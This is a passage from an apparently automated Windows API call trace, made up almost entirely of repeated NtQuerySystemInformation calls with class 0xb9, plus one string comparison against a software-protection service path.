(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fccb0, Length=0x28, ResultLength=0x0) [0230.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0230.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcbd0, Length=0x20, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc90, Length=0x20, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0230.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0230.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0230.521] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] 